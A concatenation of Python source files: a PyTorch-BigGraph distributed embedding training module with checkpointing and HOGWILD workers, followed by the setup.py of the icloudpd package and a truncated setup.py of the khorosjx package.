from torchbiggraph.row_adagrad import RowAdagrad
from torchbiggraph.stats import Stats, StatsHandler
from torchbiggraph.types import (
SINGLE_TRAINER,
UNPARTITIONED,
Bucket,
EntityName,
FloatTensorType,
ModuleStateDict,
Partition,
Rank,
)
from torchbiggraph.util import (
BucketLogger,
DummyOptimizer,
EmbeddingHolder,
allocate_shared_tensor,
create_pool,
fast_approx_rand,
get_async_result,
get_num_workers,
hide_distributed_logging,
round_up_to_nearest_multiple,
split_almost_equally,
tag_logs_with_process_name,
)
logger = logging.getLogger("torchbiggraph")
dist_logger = logging.LoggerAdapter(logger, {"distributed": True})
class Trainer(AbstractBatchProcessor):
def __init__(
self,
model_optimizer: Optimizer,
loss_fn: AbstractLossFunction,
relation_weights: List[float],
) -> None:
super().__init__(loss_fn, relation_weights)
self.model_optimizer = model_optimizer
self.unpartitioned_optimizers: Dict[EntityName, Optimizer] = {}
self.partitioned_optimizers: Dict[Tuple[EntityName, Partition], Optimizer] = {}
def _process_one_batch(
self, model: MultiRelationEmbedder, batch_edges: EdgeList
) -> Stats:
model.zero_grad()
scores, reg = model(batch_edges)
loss = self.calc_loss(scores, batch_edges)
stats = Stats(
loss=float(loss),
reg=float(reg) if reg is not None else 0.0,
violators_lhs=int((scores.lhs_neg > scores.lhs_pos.unsqueeze(1)).sum()),
violators_rhs=int((scores.rhs_neg > scores.rhs_pos.unsqueeze(1)).sum()),
count=len(batch_edges),
)
if reg is not None:
(loss + reg).backward()
else:
loss.backward()
self.model_optimizer.step(closure=None)
for optimizer in self.unpartitioned_optimizers.values():
optimizer.step(closure=None)
for optimizer in self.partitioned_optimizers.values():
optimizer.step(closure=None)
return stats
class IterationManager(MetadataProvider):
def __init__(
self,
num_epochs: int,
edge_paths: List[str],
num_edge_chunks: int,
*,
iteration_idx: int = 0,
) -> None:
self.num_epochs = num_epochs
self.edge_paths = edge_paths
self.num_edge_chunks = num_edge_chunks
self.iteration_idx = iteration_idx
@property
def epoch_idx(self) -> int:
return self.iteration_idx // self.num_edge_chunks // self.num_edge_paths
@property
def num_edge_paths(self) -> int:
return len(self.edge_paths)
@property
def edge_path_idx(self) -> int:
return self.iteration_idx // self.num_edge_chunks % self.num_edge_paths
@property
def edge_path(self) -> str:
return self.edge_paths[self.edge_path_idx]
@property
def edge_chunk_idx(self) -> int:
return self.iteration_idx % self.num_edge_chunks
def __iter__(self) -> Iterable[Tuple[int, int, int]]:
while self.epoch_idx < self.num_epochs:
yield self.epoch_idx, self.edge_path_idx, self.edge_chunk_idx
self.iteration_idx += 1
def get_checkpoint_metadata(self) -> Dict[str, Any]:
return {
"iteration/num_epochs": self.num_epochs,
"iteration/epoch_idx": self.epoch_idx,
"iteration/num_edge_paths": self.num_edge_paths,
"iteration/edge_path_idx": self.edge_path_idx,
"iteration/edge_path": self.edge_path,
"iteration/num_edge_chunks": self.num_edge_chunks,
"iteration/edge_chunk_idx": self.edge_chunk_idx,
}
def __add__(self, delta: int) -> "IterationManager":
return IterationManager(
self.num_epochs,
self.edge_paths,
self.num_edge_chunks,
iteration_idx=self.iteration_idx + delta,
)
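# A minimal sketch (not part of the original module) of how the properties above
# invert the flattened iteration index, using hypothetical sizes of 2 epochs,
# 2 edge paths and 3 chunks per path:
def _example_iteration_decomposition():
    im = IterationManager(num_epochs=2, edge_paths=["a", "b"], num_edge_chunks=3, iteration_idx=7)
    # 7 == (epoch 1 * 2 paths + path 0) * 3 chunks + chunk 1
    assert (im.epoch_idx, im.edge_path_idx, im.edge_chunk_idx) == (1, 0, 1)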
def should_preserve_old_checkpoint(
iteration_manager: IterationManager, interval: Optional[int]
) -> bool:
"""Whether the checkpoint consumed by the current iteration should be kept
Given the period, in number of epochs, at which to snapshot checkpoints,
    determine whether the checkpoint that is used as input by the current
iteration (as determined by the given manager) should be preserved rather
than getting cleaned up.
"""
if interval is None:
return False
is_checkpoint_epoch = iteration_manager.epoch_idx % interval == 0
is_first_edge_path = iteration_manager.edge_path_idx == 0
is_first_edge_chunk = iteration_manager.edge_chunk_idx == 0
return is_checkpoint_epoch and is_first_edge_path and is_first_edge_chunk
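# A minimal sketch (not part of the original module) of the rule above, assuming
# a hypothetical snapshot interval of 2 epochs, one edge path and 2 chunks:
# only the checkpoint consumed at the first chunk of epochs 0, 2, 4, ... is kept.
def _example_should_preserve():
    im = IterationManager(num_epochs=4, edge_paths=["a"], num_edge_chunks=2)
    assert should_preserve_old_checkpoint(im, interval=2)          # epoch 0, chunk 0
    assert not should_preserve_old_checkpoint(im + 1, interval=2)  # epoch 0, chunk 1
    assert not should_preserve_old_checkpoint(im + 2, interval=2)  # epoch 1, chunk 0
    assert not should_preserve_old_checkpoint(im, interval=None)   # snapshotting disabled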
def get_num_edge_chunks(config: ConfigSchema) -> int:
if config.num_edge_chunks is not None:
return config.num_edge_chunks
max_edges_per_bucket = 0
# We should check all edge paths, all lhs partitions and all rhs partitions,
# but the combinatorial explosion could lead to thousands of checks. Let's
# assume that edges are uniformly distributed among buckets (this is not
# exactly the case, as it's the entities that are uniformly distributed
# among the partitions, and edge assignments to buckets are a function of
# that, thus, for example, very high degree entities could skew this), and
# use the size of bucket (0, 0) as an estimate of the average bucket size.
# We still do it for all edge paths as there could be semantic differences
# between them which lead to different sizes.
for edge_path in config.edge_paths:
edge_storage = EDGE_STORAGES.make_instance(edge_path)
max_edges_per_bucket = max(
max_edges_per_bucket,
edge_storage.get_number_of_edges(UNPARTITIONED, UNPARTITIONED),
)
return max(1, math.ceil(max_edges_per_bucket / config.max_edges_per_chunk))
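# A worked instance of the estimate above, with hypothetical numbers: if bucket
# (0, 0) of the largest edge path holds 10,000,000 edges and
# config.max_edges_per_chunk is 3,000,000, this returns ceil(10e6 / 3e6) = 4.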
def make_optimizer(
config: ConfigSchema, params: Iterable[torch.nn.Parameter], is_emb: bool
) -> Optimizer:
params = list(params)
if len(params) == 0:
optimizer = DummyOptimizer()
elif is_emb:
optimizer = RowAdagrad(params, lr=config.lr)
else:
if config.relation_lr is not None:
lr = config.relation_lr
else:
lr = config.lr
optimizer = AsyncAdagrad(params, lr=lr)
optimizer.share_memory()
return optimizer
NOOP_STATS_HANDLER = StatsHandler()
class TrainingCoordinator:
def __init__( # noqa
self,
config: ConfigSchema,
model: Optional[MultiRelationEmbedder] = None,
trainer: Optional[AbstractBatchProcessor] = None,
evaluator: Optional[AbstractBatchProcessor] = None,
rank: Rank = SINGLE_TRAINER,
subprocess_init: Optional[Callable[[], None]] = None,
stats_handler: StatsHandler = NOOP_STATS_HANDLER,
):
"""Each epoch/pass, for each partition pair, loads in embeddings and edgelist
from disk, runs HOGWILD training on them, and writes partitions back to disk.
"""
tag_logs_with_process_name(f"Trainer-{rank}")
self.config = config
if config.verbose > 0:
import pprint
pprint.PrettyPrinter().pprint(config.to_dict())
logger.info("Loading entity counts...")
entity_storage = ENTITY_STORAGES.make_instance(config.entity_path)
entity_counts: Dict[str, List[int]] = {}
for entity, econf in config.entities.items():
entity_counts[entity] = []
for part in range(econf.num_partitions):
entity_counts[entity].append(entity_storage.load_count(entity, part))
# Figure out how many lhs and rhs partitions we need
holder = self.holder = EmbeddingHolder(config)
logger.debug(
f"nparts {holder.nparts_lhs} {holder.nparts_rhs} "
f"types {holder.lhs_partitioned_types} {holder.rhs_partitioned_types}"
)
        # We know ahead of time that we will need 1-2 storages for each embedding type,
        # as well as the max size of this storage (num_entities x D).
        # We allocate these storages in advance in `embedding_storage_freelist`.
# When we need storage for an entity type, we pop it from this free list,
# and then add it back when we 'delete' the embedding table.
embedding_storage_freelist: Dict[
EntityName, Set[torch.FloatStorage]
] = defaultdict(set)
for entity_type, counts in entity_counts.items():
max_count = max(counts)
num_sides = (
(1 if entity_type in holder.lhs_partitioned_types else 0)
+ (1 if entity_type in holder.rhs_partitioned_types else 0)
+ (
1
if entity_type
in (holder.lhs_unpartitioned_types | holder.rhs_unpartitioned_types)
else 0
)
)
for _ in range(num_sides):
embedding_storage_freelist[entity_type].add(
allocate_shared_tensor(
(max_count, config.entity_dimension(entity_type)),
dtype=torch.float,
).storage()
)
# create the handlers, threads, etc. for distributed training
if config.num_machines > 1 or config.num_partition_servers > 0:
if not 0 <= rank < config.num_machines:
raise RuntimeError("Invalid rank for trainer")
if not td.is_available():
raise RuntimeError(
"The installed PyTorch version doesn't provide "
"distributed training capabilities."
)
ranks = ProcessRanks.from_num_invocations(
config.num_machines, config.num_partition_servers
)
num_ps_groups = config.num_groups_for_partition_server
groups: List[List[int]] = [ranks.trainers] # barrier group
groups += [
ranks.trainers + ranks.partition_servers
] * num_ps_groups # ps groups
group_idxs_for_partition_servers = range(1, len(groups))
if rank == SINGLE_TRAINER:
logger.info("Setup lock server...")
start_server(
LockServer(
num_clients=len(ranks.trainers),
nparts_lhs=holder.nparts_lhs,
nparts_rhs=holder.nparts_rhs,
entities_lhs=holder.lhs_partitioned_types,
entities_rhs=holder.rhs_partitioned_types,
entity_counts=entity_counts,
init_tree=config.distributed_tree_init_order,
stats_handler=stats_handler,
),
process_name="LockServer",
init_method=config.distributed_init_method,
world_size=ranks.world_size,
server_rank=ranks.lock_server,
groups=groups,
subprocess_init=subprocess_init,
)
self.bucket_scheduler = DistributedBucketScheduler(
server_rank=ranks.lock_server, client_rank=ranks.trainers[rank]
)
logger.info("Setup param server...")
start_server(
ParameterServer(num_clients=len(ranks.trainers)),
process_name=f"ParamS-{rank}",
init_method=config.distributed_init_method,
world_size=ranks.world_size,
server_rank=ranks.parameter_servers[rank],
groups=groups,
subprocess_init=subprocess_init,
)
parameter_sharer = ParameterSharer(
process_name=f"ParamC-{rank}",
client_rank=ranks.parameter_clients[rank],
all_server_ranks=ranks.parameter_servers,
init_method=config.distributed_init_method,
world_size=ranks.world_size,
groups=groups,
subprocess_init=subprocess_init,
)
if config.num_partition_servers == -1:
start_server(
ParameterServer(
num_clients=len(ranks.trainers),
group_idxs=group_idxs_for_partition_servers,
log_stats=True,
),
process_name=f"PartS-{rank}",
init_method=config.distributed_init_method,
world_size=ranks.world_size,
server_rank=ranks.partition_servers[rank],
groups=groups,
subprocess_init=subprocess_init,
)
groups = init_process_group(
rank=ranks.trainers[rank],
world_size=ranks.world_size,
init_method=config.distributed_init_method,
groups=groups,
)
trainer_group, *groups_for_partition_servers = groups
self.barrier_group = trainer_group
if len(ranks.partition_servers) > 0:
partition_client = PartitionClient(
ranks.partition_servers,
groups=groups_for_partition_servers,
log_stats=True,
)
else:
partition_client = None
else:
self.barrier_group = None
self.bucket_scheduler = SingleMachineBucketScheduler(
holder.nparts_lhs, holder.nparts_rhs, config.bucket_order, stats_handler
)
parameter_sharer = None
partition_client = None
hide_distributed_logging()
# fork early for HOGWILD threads
logger.info("Creating workers...")
self.num_workers = get_num_workers(config.workers)
self.pool = create_pool(
self.num_workers,
subprocess_name=f"TWorker-{rank}",
subprocess_init=subprocess_init,
)
checkpoint_manager = CheckpointManager(
config.checkpoint_path,
rank=rank,
num_machines=config.num_machines,
partition_client=partition_client,
subprocess_name=f"BackgRW-{rank}",
subprocess_init=subprocess_init,
)
self.checkpoint_manager = checkpoint_manager
checkpoint_manager.register_metadata_provider(ConfigMetadataProvider(config))
if rank == 0:
checkpoint_manager.write_config(config)
num_edge_chunks = get_num_edge_chunks(config)
self.iteration_manager = IterationManager(
config.num_epochs,
config.edge_paths,
num_edge_chunks,
iteration_idx=checkpoint_manager.checkpoint_version,
)
checkpoint_manager.register_metadata_provider(self.iteration_manager)
logger.info("Initializing global model...")
if model is None:
model = make_model(config)
model.share_memory()
loss_fn = LOSS_FUNCTIONS.get_class(config.loss_fn)(margin=config.margin)
relation_weights = [relation.weight for relation in config.relations]
if trainer is None:
trainer = Trainer(
model_optimizer=make_optimizer(config, model.parameters(), False),
loss_fn=loss_fn,
relation_weights=relation_weights,
)
if evaluator is None:
eval_overrides = {}
if config.eval_num_batch_negs is not None:
eval_overrides["num_batch_negs"] = config.eval_num_batch_negs
if config.eval_num_uniform_negs is not None:
eval_overrides["num_uniform_negs"] = config.eval_num_uniform_negs
evaluator = RankingEvaluator(
loss_fn=loss_fn,
relation_weights=relation_weights,
overrides=eval_overrides,
)
if config.init_path is not None:
self.loadpath_manager = CheckpointManager(config.init_path)
else:
self.loadpath_manager = None
# load model from checkpoint or loadpath, if available
state_dict, optim_state = checkpoint_manager.maybe_read_model()
if state_dict is None and self.loadpath_manager is not None:
state_dict, optim_state = self.loadpath_manager.maybe_read_model()
if state_dict is not None:
model.load_state_dict(state_dict, strict=False)
if optim_state is not None:
trainer.model_optimizer.load_state_dict(optim_state)
logger.debug("Loading unpartitioned entities...")
for entity in holder.lhs_unpartitioned_types | holder.rhs_unpartitioned_types:
count = entity_counts[entity][0]
s = embedding_storage_freelist[entity].pop()
dimension = config.entity_dimension(entity)
embs = torch.FloatTensor(s).view(-1, dimension)[:count]
embs, optimizer = self._load_embeddings(entity, UNPARTITIONED, out=embs)
holder.unpartitioned_embeddings[entity] = embs
trainer.unpartitioned_optimizers[entity] = optimizer
# start communicating shared parameters with the parameter server
if parameter_sharer is not None:
shared_parameters: Set[int] = set()
for name, param in model.named_parameters():
if id(param) in shared_parameters:
continue
shared_parameters.add(id(param))
key = f"model.{name}"
logger.info(
f"Adding {key} ({param.numel()} params) to parameter server"
)
parameter_sharer.set_param(key, param.data)
for entity, embs in holder.unpartitioned_embeddings.items():
key = f"entity.{entity}"
logger.info(f"Adding {key} ({embs.numel()} params) to parameter server")
parameter_sharer.set_param(key, embs.data)
# store everything in self
self.model = model
self.trainer = trainer
self.evaluator = evaluator
self.rank = rank
self.entity_counts = entity_counts
self.embedding_storage_freelist = embedding_storage_freelist
self.stats_handler = stats_handler
self.strict = False
def train(self) -> None:
holder = self.holder
config = self.config
iteration_manager = self.iteration_manager
total_buckets = holder.nparts_lhs * holder.nparts_rhs
# yield stats from checkpoint, to reconstruct
# saved part of the learning curve
if self.rank == SINGLE_TRAINER:
for stats_dict in self.checkpoint_manager.maybe_read_stats():
index: int = stats_dict["index"]
stats: Optional[Stats] = None
if "stats" in stats_dict:
stats: Stats = Stats.from_dict(stats_dict["stats"])
eval_stats_before: Optional[Stats] = None
if "eval_stats_before" in stats_dict:
eval_stats_before = Stats.from_dict(stats_dict["eval_stats_before"])
eval_stats_after: Optional[Stats] = None
if "eval_stats_after" in stats_dict:
eval_stats_after = Stats.from_dict(stats_dict["eval_stats_after"])
eval_stats_chunk_avg: Optional[Stats] = None
if "eval_stats_chunk_avg" in stats_dict:
eval_stats_chunk_avg = Stats.from_dict(
stats_dict["eval_stats_chunk_avg"]
)
self.stats_handler.on_stats(
index,
eval_stats_before,
stats,
eval_stats_after,
eval_stats_chunk_avg,
)
for epoch_idx, edge_path_idx, edge_chunk_idx in iteration_manager:
logger.info(
f"Starting epoch {epoch_idx + 1} / {iteration_manager.num_epochs}, "
f"edge path {edge_path_idx + 1} / {iteration_manager.num_edge_paths}, "
f"edge chunk {edge_chunk_idx + 1} / {iteration_manager.num_edge_chunks}"
)
edge_storage = EDGE_STORAGES.make_instance(iteration_manager.edge_path)
logger.info(f"Edge path: {iteration_manager.edge_path}")
self._barrier()
dist_logger.info("Lock client new epoch...")
self.bucket_scheduler.new_pass(
is_first=iteration_manager.iteration_idx == 0
)
self._barrier()
remaining = total_buckets
cur_b: Optional[Bucket] = None
cur_stats: Optional[BucketStats] = None
while remaining > 0:
old_b: Optional[Bucket] = cur_b
old_stats: Optional[BucketStats] = cur_stats
cur_b, remaining = self.bucket_scheduler.acquire_bucket()
logger.info(f"still in queue: {remaining}")
if cur_b is None:
cur_stats = None
if old_b is not None:
# if you couldn't get a new pair, release the lock
# to prevent a deadlock!
tic = time.perf_counter()
release_bytes = self._swap_partitioned_embeddings(
old_b, None, old_stats
)
release_time = time.perf_counter() - tic
logger.info(
f"Swapping old embeddings to release lock. io: {release_time:.2f} s for {release_bytes:,} bytes "
f"( {release_bytes / release_time / 1e6:.2f} MB/sec )"
)
time.sleep(1) # don't hammer td
continue
tic = time.perf_counter()
self.cur_b = cur_b
bucket_logger = BucketLogger(logger, bucket=cur_b)
self.bucket_logger = bucket_logger
io_bytes = self._swap_partitioned_embeddings(old_b, cur_b, old_stats)
self.model.set_all_embeddings(holder, cur_b)
current_index = (
iteration_manager.iteration_idx + 1
) * total_buckets - remaining
bucket_logger.debug("Loading edges")
edges = edge_storage.load_chunk_of_edges(
cur_b.lhs,
cur_b.rhs,
edge_chunk_idx,
iteration_manager.num_edge_chunks,
shared=True,
)
num_edges = len(edges)
# this might be off in the case of tensorlist or extra edge fields
io_bytes += edges.lhs.tensor.numel() * edges.lhs.tensor.element_size()
io_bytes += edges.rhs.tensor.numel() * edges.rhs.tensor.element_size()
io_bytes += edges.rel.numel() * edges.rel.element_size()
io_time = time.perf_counter() - tic
tic = time.perf_counter()
bucket_logger.debug("Shuffling edges")
# Fix a seed to get the same permutation every time; have it
# depend on all and only what affects the set of edges.
# Note: for the sake of efficiency, we sample eval edge idxs
# from the edge set *with replacement*, meaning that there may
# be duplicates of the same edge in the eval set. When we swap
# edges into the eval set, if there are duplicates then all
# but one will be clobbered. These collisions are unlikely
# if eval_fraction is small.
#
# Importantly, this eval sampling strategy is theoretically
# sound:
# * Training and eval sets are (exactly) disjoint
# * Eval set may have (rare) duplicates, but they are
# uniformly sampled so it's still an unbiased estimator
# of the out-of-sample statistics
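                # As a concrete, hypothetical instance: with eval_fraction
                # of 0.05 and 1,000,000 edges in the chunk, 50,000 eval
                # indices are drawn with replacement below, so a few
                # duplicates are expected but the estimate stays unbiased.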
num_eval_edges = int(num_edges * config.eval_fraction)
num_train_edges = num_edges - num_eval_edges
if num_eval_edges > 0:
g = torch.Generator()
g.manual_seed(
hash((edge_path_idx, edge_chunk_idx, cur_b.lhs, cur_b.rhs))
)
eval_edge_idxs = torch.randint(
num_edges, (num_eval_edges,), dtype=torch.long, generator=g
)
else:
eval_edge_idxs = None
# HOGWILD evaluation before training
eval_stats_before = self._coordinate_eval(edges, eval_edge_idxs)
if eval_stats_before is not None:
bucket_logger.info(f"Stats before training: {eval_stats_before}")
eval_time = time.perf_counter() - tic
tic = time.perf_counter()
# HOGWILD training
bucket_logger.debug("Waiting for workers to perform training")
stats = self._coordinate_train(edges, eval_edge_idxs, epoch_idx)
if stats is not None:
bucket_logger.info(f"Training stats: {stats}")
train_time = time.perf_counter() - tic
tic = time.perf_counter()
# HOGWILD evaluation after training
eval_stats_after = self._coordinate_eval(edges, eval_edge_idxs)
if eval_stats_after is not None:
bucket_logger.info(f"Stats after training: {eval_stats_after}")
eval_time += time.perf_counter() - tic
bucket_logger.info(
f"bucket {total_buckets - remaining} / {total_buckets} : "
f"Trained {num_train_edges} edges in {train_time:.2f} s "
f"( {num_train_edges / train_time / 1e6:.2g} M/sec ); "
f"Eval 2*{num_eval_edges} edges in {eval_time:.2f} s "
f"( {2 * num_eval_edges / eval_time / 1e6:.2g} M/sec ); "
f"io: {io_time:.2f} s for {io_bytes:,} bytes ( {io_bytes / io_time / 1e6:.2f} MB/sec )"
)
self.model.clear_all_embeddings()
cur_stats = BucketStats(
lhs_partition=cur_b.lhs,
rhs_partition=cur_b.rhs,
index=current_index,
train=stats,
eval_before=eval_stats_before,
eval_after=eval_stats_after,
)
# release the final bucket
self._swap_partitioned_embeddings(cur_b, None, cur_stats)
# Distributed Processing: all machines can leave the barrier now.
self._barrier()
current_index = (iteration_manager.iteration_idx + 1) * total_buckets - 1
self._maybe_write_checkpoint(
epoch_idx, edge_path_idx, edge_chunk_idx, current_index
)
# now we're sure that all partition files exist,
# so be strict about loading them
self.strict = True
def close(self):
# cleanup
self.pool.close()
self.pool.join()
self._barrier()
self.checkpoint_manager.close()
if self.loadpath_manager is not None:
self.loadpath_manager.close()
# FIXME join distributed workers (not really necessary)
logger.info("Exiting")
###########################################################################
# private functions
###########################################################################
def _barrier(self) -> None:
if self.barrier_group is not None:
td.barrier(group=self.barrier_group)
def _load_embeddings(
self,
entity: EntityName,
part: Partition,
out: FloatTensorType,
strict: bool = False,
force_dirty: bool = False,
) -> Tuple[torch.nn.Parameter, Optimizer]:
if strict:
embs, optim_state = self.checkpoint_manager.read(
entity, part, out=out, force_dirty=force_dirty
)
else:
# Strict is only false during the first iteration, because in that
# case the checkpoint may not contain any data (unless a previous
# run was resumed) so we fall back on initial values.
embs, optim_state = self.checkpoint_manager.maybe_read(
entity, part, out=out, force_dirty=force_dirty
)
if embs is None and self.loadpath_manager is not None:
embs, optim_state = self.loadpath_manager.maybe_read(
entity, part, out=out
)
if embs is None:
embs = out
fast_approx_rand(embs)
embs.mul_(self.config.init_scale)
optim_state = None
embs = torch.nn.Parameter(embs)
optimizer = make_optimizer(self.config, [embs], True)
if optim_state is not None:
optimizer.load_state_dict(optim_state)
return embs, optimizer
def _swap_partitioned_embeddings(
self,
old_b: Optional[Bucket],
new_b: Optional[Bucket],
old_stats: Optional[BucketStats],
) -> int:
io_bytes = 0
logger.info(f"Swapping partitioned embeddings {old_b} {new_b}")
holder = self.holder
old_parts: Set[Tuple[EntityName, Partition]] = set()
if old_b is not None:
old_parts.update((e, old_b.lhs) for e in holder.lhs_partitioned_types)
old_parts.update((e, old_b.rhs) for e in holder.rhs_partitioned_types)
new_parts: Set[Tuple[EntityName, Partition]] = set()
if new_b is not None:
new_parts.update((e, new_b.lhs) for e in holder.lhs_partitioned_types)
new_parts.update((e, new_b.rhs) for e in holder.rhs_partitioned_types)
assert old_parts == holder.partitioned_embeddings.keys()
if old_b is not None:
if old_stats is None:
raise TypeError("Got old bucket but not its stats")
logger.info("Saving partitioned embeddings to checkpoint")
for entity, part in old_parts - new_parts:
logger.debug(f"Saving ({entity} {part})")
embs = holder.partitioned_embeddings.pop((entity, part))
optimizer = self.trainer.partitioned_optimizers.pop((entity, part))
self.checkpoint_manager.write(
entity, part, embs.detach(), optimizer.state_dict()
)
self.embedding_storage_freelist[entity].add(embs.storage())
io_bytes += embs.numel() * embs.element_size() # ignore optim state
# these variables are holding large objects; let them be freed
del embs
del optimizer
self.bucket_scheduler.release_bucket(old_b, old_stats)
if new_b is not None:
logger.info("Loading partitioned embeddings from checkpoint")
for entity, part in new_parts - old_parts:
logger.debug(f"Loading ({entity} {part})")
force_dirty = self.bucket_scheduler.check_and_set_dirty(entity, part)
count = self.entity_counts[entity][part]
s = self.embedding_storage_freelist[entity].pop()
dimension = self.config.entity_dimension(entity)
embs = torch.FloatTensor(s).view(-1, dimension)[:count]
embs, optimizer = self._load_embeddings(
entity, part, out=embs, strict=self.strict, force_dirty=force_dirty
)
holder.partitioned_embeddings[entity, part] = embs
self.trainer.partitioned_optimizers[entity, part] = optimizer
io_bytes += embs.numel() * embs.element_size() # ignore optim state
assert new_parts == holder.partitioned_embeddings.keys()
return io_bytes
def _coordinate_train(self, edges, eval_edge_idxs, epoch_idx) -> Stats:
assert self.config.num_gpus == 0, "GPU training not supported"
if eval_edge_idxs is not None:
num_train_edges = len(edges) - len(eval_edge_idxs)
train_edge_idxs = torch.arange(len(edges))
train_edge_idxs[eval_edge_idxs] = torch.arange(num_train_edges, len(edges))
train_edge_idxs = train_edge_idxs[:num_train_edges]
edge_perm = train_edge_idxs[torch.randperm(num_train_edges)]
else:
edge_perm = torch.randperm(len(edges))
future_all_stats = self.pool.map_async(
call,
[
partial(
process_in_batches,
batch_size=self.config.batch_size,
model=self.model,
batch_processor=self.trainer,
edges=edges,
indices=edge_perm[s],
# FIXME should we only delay if iteration_idx == 0?
delay=self.config.hogwild_delay
if epoch_idx == 0 and self.rank > 0
else 0,
)
for rank, s in enumerate(
split_almost_equally(edge_perm.size(0), num_parts=self.num_workers)
)
],
)
all_stats = get_async_result(future_all_stats, self.pool)
return Stats.sum(all_stats).average()
def _coordinate_eval(self, edges, eval_edge_idxs) -> Optional[Stats]:
eval_batch_size = round_up_to_nearest_multiple(
self.config.batch_size, self.config.eval_num_batch_negs
)
if eval_edge_idxs is not None:
self.bucket_logger.debug("Waiting for workers to perform evaluation")
future_all_eval_stats = self.pool.map_async(
call,
[
partial(
process_in_batches,
batch_size=eval_batch_size,
model=self.model,
batch_processor=self.evaluator,
edges=edges,
indices=eval_edge_idxs[s],
)
for s in split_almost_equally(
eval_edge_idxs.size(0), num_parts=self.num_workers
)
],
)
all_eval_stats = get_async_result(future_all_eval_stats, self.pool)
return Stats.sum(all_eval_stats).average()
else:
return None
def _maybe_write_checkpoint(
self,
epoch_idx: int,
edge_path_idx: int,
edge_chunk_idx: int,
current_index: int,
) -> None:
config = self.config
# Preserving a checkpoint requires two steps:
# - create a snapshot (w/ symlinks) after it's first written;
# - don't delete it once the following one is written.
# These two happen in two successive iterations of the main loop: the
# one just before and the one just after the epoch boundary.
preserve_old_checkpoint = should_preserve_old_checkpoint(
self.iteration_manager, config.checkpoint_preservation_interval
)
preserve_new_checkpoint = should_preserve_old_checkpoint(
self.iteration_manager + 1, config.checkpoint_preservation_interval
)
# Write metadata: for multiple machines, write from rank-0
logger.info(
f"Finished epoch {epoch_idx + 1} / {self.iteration_manager.num_epochs}, "
f"edge path {edge_path_idx + 1} / {self.iteration_manager.num_edge_paths}, "
f"edge chunk {edge_chunk_idx + 1} / "
f"{self.iteration_manager.num_edge_chunks}"
)
if self.rank == 0:
for entity, embs in self.holder.unpartitioned_embeddings.items():
logger.info(f"Writing {entity} embeddings")
optimizer = self.trainer.unpartitioned_optimizers[entity]
self.checkpoint_manager.write(
entity,
UNPARTITIONED,
embs.detach(),
optimizer.state_dict(),
unpartitioned=True,
)
logger.info("Writing the metadata")
state_dict: ModuleStateDict = self.model.state_dict()
self.checkpoint_manager.write_model(
state_dict, self.trainer.model_optimizer.state_dict()
)
logger.info("Writing the training stats")
all_stats_dicts: List[Dict[str, Any]] = []
bucket_eval_stats_list = []
chunk_stats_dict = {
"epoch_idx": epoch_idx,
"edge_path_idx": edge_path_idx,
"edge_chunk_idx": edge_chunk_idx,
}
for stats in self.bucket_scheduler.get_stats_for_pass():
stats_dict = {
"lhs_partition": stats.lhs_partition,
"rhs_partition": stats.rhs_partition,
"index": stats.index,
"stats": stats.train.to_dict(),
}
if stats.eval_before is not None:
stats_dict["eval_stats_before"] = stats.eval_before.to_dict()
bucket_eval_stats_list.append(stats.eval_before)
if stats.eval_after is not None:
stats_dict["eval_stats_after"] = stats.eval_after.to_dict()
stats_dict.update(chunk_stats_dict)
all_stats_dicts.append(stats_dict)
if len(bucket_eval_stats_list) != 0:
eval_stats_chunk_avg = Stats.average_list(bucket_eval_stats_list)
self.stats_handler.on_stats(
index=current_index, eval_stats_chunk_avg=eval_stats_chunk_avg
)
chunk_stats_dict["index"] = current_index
chunk_stats_dict[
"eval_stats_chunk_avg"
] = eval_stats_chunk_avg.to_dict()
all_stats_dicts.append(chunk_stats_dict)
self.checkpoint_manager.append_stats(all_stats_dicts)
logger.info("Writing the checkpoint")
self.checkpoint_manager.write_new_version(
config, self.entity_counts, self.embedding_storage_freelist
)
dist_logger.info(
"Waiting for other workers to write their parts of the checkpoint"
)
self._barrier()
dist_logger.info("All parts of the checkpoint have been written")
logger.info("Switching to the new checkpoint version")
self.checkpoint_manager.switch_to_new_version()
dist_logger.info(
"Waiting for other workers to switch to the new checkpoint version"
)
self._barrier()
dist_logger.info("All workers have switched to the new checkpoint version")
        # After all the machines have finished committing the checkpoint,
        # we either remove the old checkpoint or preserve it
if preserve_new_checkpoint:
            # Add 1 so the index is a multiple of the interval; it looks nicer.
self.checkpoint_manager.preserve_current_version(config, epoch_idx + 1)
if not preserve_old_checkpoint:
self.checkpoint_manager.remove_old_version(config)
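# A minimal standalone sketch (not part of this trainer) of the rounding helper
# used above to derive `eval_batch_size`: round `value` up to the nearest
# multiple of `factor`. The name and placement here are illustrative only.
def _round_up_to_nearest_multiple_sketch(value: int, factor: int) -> int:
    # e.g. value=1000, factor=384 -> 1152
    return ((value + factor - 1) // factor) * factor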
|
from setuptools import setup, find_packages
with open("requirements.txt") as f:
required = f.read().splitlines()
setup(
name="icloudpd",
version="1.4.3",
url="https://github.com/ndbroadbent/icloud_photos_downloader",
description=(
"icloudpd is a command-line tool to download photos and videos from iCloud."
),
maintainer="Nathan Broadbent",
maintainer_email="icloudpd@ndbroadbent.com",
license="MIT",
packages=find_packages(),
install_requires=required,
classifiers=[
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
],
entry_points={"console_scripts": ["icloudpd = icloudpd.base:main"]},
)
|
# -*- coding: utf-8 -*-
import setuptools
import khorosjx.utils.version
with open("README.md", "r") as fh:
long_description = fh.read()
version = khorosjx.utils.version.__version__
setuptools.setup(
name="khorosjx",
version=version,
author="Jeff Shurtliff",
author_email="jeff.shurtliff@rsa.com",
description="Useful tools and utilities to assist in managing a Khoros JX (formerly Jive-x) or Jive-n community.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/jeffshurtliff/khorosjx",
packages=setuptools.find_packages(),
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Intended Audience :: Information Technology",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Communications",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: Content Management System",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: Message Boards",
"Topic :: Internet :: WWW/HTTP :: Site Management"
],
python_requires='>=3.6',
install_requires=[
"PyYAML>=5.4.1",
"urllib3>=1.26.6",
"requests>=2.26.0",
"pandas>=1.3.3",
